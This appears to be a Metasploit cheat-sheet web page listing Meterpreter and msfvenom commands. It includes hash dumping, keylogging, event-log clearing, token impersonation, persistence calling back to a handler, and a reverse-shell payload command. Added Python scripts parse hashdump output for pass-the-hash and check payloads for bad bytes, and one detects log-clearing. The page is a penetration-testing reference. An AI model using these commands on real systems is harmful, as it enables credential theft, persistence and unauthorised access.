Metasploit Cheat Sheet for Ethical Hacker

Metasploit Cheat Sheet

What is Metasploit?

Metasploit is the world's most widely used open-source penetration testing framework. Security engineers use it both as a penetration testing platform and as a development framework for writing their own modules, security tools and exploits. Because it packages exploitation, payload delivery and post-exploitation behind a few console commands, it is equally useful to attackers and to defenders who want to reproduce attacks and test their detections.

Meterpreter commands

Basic and file handling commands

Command            Description
sysinfo            Display system information (hostname, OS, architecture, Meterpreter architecture)
ps                 List running processes
kill <PID>         Terminate a running process
getuid             Display the user the Meterpreter session is running as
upload / download  Upload a file to / download a file from the target
pwd / lpwd         Print the working directory on the target (pwd) or on the attacker's machine (lpwd)
cd / lcd           Change directory on the target (cd) or locally (lcd)
cat                Display file content
bglist             List scripts running in the background
bgrun              Run a script in the background
bgkill             Terminate a background script
background         Move the active session to the background and return to the msf console
edit <file>        Edit a file on the target in vim
shell              Open a command shell on the target
migrate <PID>      Migrate Meterpreter into another process
idletime           Display how long the interactive user has been idle
screenshot         Take a screenshot of the current desktop
clearev            Clear the Windows Application, System and Security event logs (note that clearing a log is itself recorded as a "log cleared" event, so this is noisy, not stealthy, and should only be done when the engagement scope allows it)
? / help           Show all commands
exit / quit        Exit the Meterpreter session
shutdown / reboot  Shut down / reboot the target
load <extension>   Load a Meterpreter extension (use is the older alias)
channel            List active channels
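The defender's side of clearev: the Windows event log records the act of clearing a log (Security log: Event ID 1102; System and Application logs: Event ID 104, both from the Microsoft-Windows-Eventlog provider), and clearev wipes all three within a second or two. The script below, an added example that is not part of the original cheat sheet, runs that detection over constructed JSON-exported events; the field names (Channel, EventID, Computer, SubjectUser, TimeCreated) are an assumed export format, so map them to whatever your log pipeline emits.

```python
"""Detect Windows "log cleared" events, the trace that Meterpreter's clearev leaves.

Added example, not part of the original cheat sheet. SAMPLE_EVENTS is constructed
and its field names are an assumed JSON export format.
"""
import json
from datetime import datetime

# Windows records the clearing of a log inside the log itself:
#   Security            -> Event ID 1102 "The audit log was cleared"
#   System, Application -> Event ID 104  "The <name> log file was cleared"
LOG_CLEARED = {("Security", 1102), ("System", 104), ("Application", 104)}

# Constructed sample: WS01 had all three logs wiped within seconds (clearev
# behaviour); WS02 shows a lone System-log clear, e.g. an admin tidying up.
SAMPLE_EVENTS = """
{"Channel": "Security", "EventID": 4624, "Computer": "WS01", "SubjectUser": "alice", "TimeCreated": "2024-03-01T10:00:00Z"}
{"Channel": "Application", "EventID": 104, "Computer": "WS01", "SubjectUser": "SYSTEM", "TimeCreated": "2024-03-01T10:05:10Z"}
{"Channel": "System", "EventID": 104, "Computer": "WS01", "SubjectUser": "SYSTEM", "TimeCreated": "2024-03-01T10:05:11Z"}
{"Channel": "Security", "EventID": 1102, "Computer": "WS01", "SubjectUser": "SYSTEM", "TimeCreated": "2024-03-01T10:05:12Z"}
{"Channel": "System", "EventID": 7036, "Computer": "WS02", "SubjectUser": "SYSTEM", "TimeCreated": "2024-03-01T11:00:00Z"}
{"Channel": "System", "EventID": 104, "Computer": "WS02", "SubjectUser": "bob", "TimeCreated": "2024-03-01T11:30:00Z"}
"""


def parse_events(text):
    """Parse one JSON record per line; TimeCreated becomes an aware datetime."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        rec["TimeCreated"] = datetime.fromisoformat(rec["TimeCreated"].replace("Z", "+00:00"))
        events.append(rec)
    return events


def find_log_clears(events):
    """Every individual 'log cleared' event; each one deserves a look on its own."""
    return [e for e in events if (e["Channel"], e["EventID"]) in LOG_CLEARED]


def clearev_candidates(events, window_seconds=60):
    """Hosts where Application, System and Security were all cleared inside the
    window. Returns {host: {"first_seen": iso_time, "cleared_by": user}}."""
    by_host = {}
    for e in find_log_clears(events):
        by_host.setdefault(e["Computer"], []).append(e)

    hits = {}
    for host, clears in by_host.items():
        clears.sort(key=lambda e: e["TimeCreated"])
        for i, first in enumerate(clears):
            channels = set()
            for e in clears[i:]:
                if (e["TimeCreated"] - first["TimeCreated"]).total_seconds() <= window_seconds:
                    channels.add(e["Channel"])
            if channels >= {"Application", "System", "Security"}:
                hits[host] = {
                    "first_seen": first["TimeCreated"].isoformat(),
                    "cleared_by": first.get("SubjectUser"),
                }
                break
    return hits


if __name__ == "__main__":
    evts = parse_events(SAMPLE_EVENTS)
    for e in find_log_clears(evts):
        print(f"{e['Computer']}: {e['Channel']} cleared by {e['SubjectUser']} at {e['TimeCreated']}")
    print("clearev-like activity:", clearev_candidates(evts))
```

Forward the logs off the host before you need them: clearev only removes the local copies, so a collector that already received the 4624/4688 events and then receives the 1102/104 triple still has the full story.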

Process handling commands

Command         Description
getpid          Display the process ID Meterpreter is running in
getuid          Display the user ID
ps              Display running processes
kill <PID>      Terminate a process
getprivs        Enable all privileges available to the current process token and list them
reg             Interact with the target registry (enumkey, queryval, setval, ...)
shell           Open a shell on the target
execute         Run a specified program (-f <file>, -i to interact, -c for a channelized process, -H hidden)
migrate <PID>   Migrate Meterpreter into the given process ID

Interface / output commands

Command          Description
enumdesktops     List all accessible desktops and window stations
getdesktop       Display the session's current desktop
setdesktop       Switch the session to another desktop
keyscan_start    Start the keylogger on the target
keyscan_dump     Dump the keystrokes captured so far
keyscan_stop     Stop the keylogger

Password management commands

hashdump         Dump the LM/NTLM password hashes from the local SAM (requires SYSTEM privileges; run getsystem first if needed)

Msfvenom command options

Switch   Syntax             Description
-p       -p <payload>       Payload to use (msfvenom -l payloads lists them; --list-options shows the chosen payload's options)
-l       -l <type>          List modules of a type: payloads, encoders, nops, formats, platforms, archs
-f       -f <format>        Output format (exe, elf, raw, c, python, ...); -l formats lists them
-e       -e <encoder>       Encoder to use
-a       -a <arch>          Target architecture (x86, x64, ...); the target OS is set separately with --platform
-s       -s <size>          Maximum size of the resulting payload
-b       -b <chars>         Bad characters the payload must not contain, e.g. '\x00\x0a\x0d'
-i       -i <count>         Number of encoding iterations
-x       -x <file>          Custom executable to use as a template
-o       -o <file>          Save the payload to a file
-h       -h                 Help
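Two things practitioners get wrong with the options above are the -b string syntax and trusting that encoding actually removed every bad byte. The following added example (not from the original page; SAMPLE_RAW is a constructed byte string standing in for `msfvenom -f raw` output, not real shellcode) parses a -b argument the way msfvenom reads it, assembles a safe argument vector for subprocess, and scans a raw payload for bytes that must not be present.

```python
"""Assemble an msfvenom command line and verify raw output against the -b set.

Added example, not part of the original cheat sheet. SAMPLE_RAW is constructed
and is not shellcode; msfvenom itself is not invoked here.
"""


def parse_badchar_spec(spec: str) -> bytes:
    """Convert an msfvenom -b argument such as '\\x00\\x0a\\x0d' to bytes.

    \\xNN escapes become single bytes; any other character is taken literally
    (so -b '\\x00/' forbids NUL and the slash)."""
    out = bytearray()
    i = 0
    while i < len(spec):
        if spec.startswith("\\x", i) and i + 4 <= len(spec):
            out.append(int(spec[i + 2:i + 4], 16))
            i += 4
        else:
            out.append(ord(spec[i]))
            i += 1
    return bytes(out)


def find_bad_chars(payload: bytes, badchars: bytes):
    """Return (offset, byte) for every forbidden byte still in the payload.

    Run this on -f raw output before use: -e/-i usually strip bad chars from the
    encoded body, but the decoder stub itself can still contain one."""
    return [(i, b) for i, b in enumerate(payload) if b in badchars]


def msfvenom_argv(payload, options, fmt="raw", badchars="", encoder=None,
                  iterations=None, arch=None, platform=None, template=None,
                  out=None):
    """Build the argument vector for subprocess.run (no shell, so no quoting bugs)."""
    argv = ["msfvenom", "-p", payload]
    argv += [f"{k}={v}" for k, v in options.items()]   # LHOST=..., LPORT=...
    argv += ["-f", fmt]
    if badchars:
        argv += ["-b", badchars]
    if encoder:
        argv += ["-e", encoder]
    if iterations:
        argv += ["-i", str(iterations)]
    if arch:
        argv += ["-a", arch]
    if platform:
        argv += ["--platform", platform]
    if template:
        argv += ["-x", template]
    if out:
        argv += ["-o", out]
    return argv


# Constructed stand-in for raw payload bytes: contains a NUL at offset 3 and a
# newline at offset 8, the two bytes most string-based targets choke on.
SAMPLE_RAW = b"\x31\xc0\x50\x00\x68\x2f\x2f\x73\x0a\x68"


if __name__ == "__main__":
    bad = parse_badchar_spec(r"\x00\x0a")
    print("argv:", " ".join(msfvenom_argv(
        "windows/shell_reverse_tcp", {"LHOST": "10.0.0.5", "LPORT": "443"},
        badchars=r"\x00\x0a", encoder="x86/shikata_ga_nai", iterations=3)))
    for off, byte in find_bad_chars(SAMPLE_RAW, bad):
        print(f"bad byte 0x{byte:02x} at offset {off}")
```

If find_bad_chars reports anything after encoding, change the encoder (-e), raise the iteration count (-i), or pick a payload whose decoder stub fits the constraint rather than shipping it and hoping.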

Examples

Meterpreter upload a file to a Windows target (escape backslashes, or use forward slashes, in Windows paths; pick a directory the session's user can write to):

meterpreter> upload <local_file> C:\\Windows\\Temp

Meterpreter download file from Windows target:

meterpreter> download c:\\windows\\repair\\sam /tmp

Meterpreter run an .exe on the target, handy for executing an uploaded tool:

meterpreter> execute -f c:\\windows\\temp\\exploit.exe

Create a new channel running cmd.exe (-c channelizes the process I/O; add -i to interact with it immediately and -H to hide its window):

meterpreter> execute -f cmd -c

Meterpreter show processes:

meterpreter> ps

Meterpreter get shell on the target:

meterpreter> shell

Meterpreter attempts privilege escalation to SYSTEM on the target (cycles through its built-in techniques; if none works, fall back to a local privilege-escalation exploit module):

meterpreter> getsystem

Meterpreter attempts to dump the password hashes on the target (hashdump needs SYSTEM; the old credcollect script is now the credential_collector post module):

meterpreter> hashdump
meterpreter> run post/windows/gather/credentials/credential_collector
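hashdump prints one line per SAM account in the form user:rid:lm_hash:nt_hash:::, and a practitioner triages that output before reusing anything. The parser below is an added example, not part of the original cheat sheet: the dump it parses is constructed (the NT and LM hash values are arbitrary hex except for the two well-known empty-hash constants), and it flags blank passwords, accounts still storing an LM hash, and users sharing the same NT hash, then formats the LM:NT pair the way exploit/windows/smb/psexec expects in SMBPass for a pass-the-hash attempt. It also covers the hashdump entry in the password management table above.

```python
"""Parse Meterpreter hashdump output and triage the accounts.

Added example, not part of the original cheat sheet. SAMPLE_HASHDUMP is a
constructed dump; apart from the two constants, the hash values are arbitrary.
"""
from dataclasses import dataclass

# LM field shown when no LM hash is stored, and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0c4d2d5fc8f0a3e1b6a9d7c2e5f48b13:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:1a2b3c4d5e6f708192a3b4c5d6e7f809:0c4d2d5fc8f0a3e1b6a9d7c2e5f48b13:::
alice:1002:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
"""


@dataclass
class SamEntry:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def nt_blank(self) -> bool:
        # Blank password. hashdump does not show whether the account is disabled
        # (Guest and DefaultAccount usually are), so confirm before celebrating.
        return self.nt == EMPTY_NT

    @property
    def lm_stored(self) -> bool:
        # A real LM hash means LM storage is still enabled: trivially crackable.
        return self.lm != EMPTY_LM

    @property
    def builtin(self) -> bool:
        return self.rid < 1000          # well-known RIDs: 500 Administrator, 501 Guest, ...

    @property
    def smbpass(self) -> str:
        # Value for SMBPass in exploit/windows/smb/psexec (pass-the-hash).
        return f"{self.lm}:{self.nt}"


def parse_hashdump(text: str):
    """Parse user:rid:lm:nt::: lines; anything else (banners, blanks) is skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        entries.append(SamEntry(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return entries


def shared_nt_hashes(entries):
    """NT hashes used by more than one account (same password reused)."""
    by_nt = {}
    for e in entries:
        if not e.nt_blank:
            by_nt.setdefault(e.nt, []).append(e.user)
    return {h: users for h, users in by_nt.items() if len(users) > 1}


def triage(entries):
    """The findings a tester acts on first, in the order to act on them."""
    return {
        "blank_password": [e.user for e in entries if e.nt_blank],
        "lm_hash_stored": [e.user for e in entries if e.lm_stored],
        "shared_nt_hash": shared_nt_hashes(entries),
    }


if __name__ == "__main__":
    sam = parse_hashdump(SAMPLE_HASHDUMP)
    for key, value in triage(sam).items():
        print(f"{key}: {value}")
    print("psexec SMBPass for Administrator:", sam[0].smbpass)
```

A shared NT hash between a built-in Administrator and a service account is the classic lateral-movement lead: the same hash will very likely work with psexec against every host where that local administrator password was reused.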

Meterpreter create a port forward: local port 3389 (-l) on the attacker's machine is tunnelled through the session to port 3389 (-p) on $IP (-r), a host reachable from the compromised machine, so an RDP client pointed at localhost:3389 reaches it:

meterpreter> portfwd add -l 3389 -p 3389 -r $IP

Meterpreter list and delete port forwards:

meterpreter> portfwd list
meterpreter> portfwd delete -l 3389 -p 3389 -r $IP

Search for Excel files on the target (add -d <directory> to limit the search to a directory tree):

meterpreter> search -f *.xlsx

Get user id:

meterpreter> getuid

Check that the Meterpreter architecture matches the OS (sysinfo shows both as "Architecture" and "Meterpreter"): a 32-bit Meterpreter on 64-bit Windows sees a redirected file system and registry and some post modules misbehave, so migrate into an x64 process first:

meterpreter> sysinfo

Identify other machines that the current domain user has local administrative access to (a post module, run from inside the Meterpreter session):

meterpreter> run post/windows/gather/local_admin_search_enum

Open a raw TCP connection to a host from the console (netcat-style):

msf> connect $TARGET $PORT

Same, over SSL:

msf> connect -s $TARGET $PORT

Start an interactive Ruby shell inside the console:

msf> irb

Integrations with other tools: plugins are loaded one per load command (the page lists pcap, wmap and nessus), and the results they import are queried through the database commands. Current versions use hosts, vulns, services and loot; db_hosts, db_vulns and db_exploited are the old names from earlier releases:

msf> load wmap
msf> load nessus
msf> hosts
msf> vulns

Meterpreter persistence (the legacy persistence script; current releases replace it with the exploit/windows/local/persistence module): -U starts the payload at user logon, -i 5 makes it reconnect every 5 seconds, -p 443 and -r $IP are the port and address of the handler that must be listening:

meterpreter> run persistence -U -i 5 -p 443 -r $IP

Impersonate another user whose token is present on the box (incognito is an extension, so load it first; listing and stealing tokens usually requires SYSTEM, and the backslash in the token name must be escaped):

meterpreter> load incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token MACHINE\\user
meterpreter> drop_token



  1. I like what you guys are up to. Such smart work and reporting! Carry on the superb work, guys; I've incorporated you guys into my blogroll. I think it'll improve the value of my site 🙂

  2. It is the best time to make some plans for the future and it is time to be happy. I’ve read this post and if I could I want to suggest you some interesting things or advice. Maybe you can write next articles referring to this article. I wish to read more things about it!
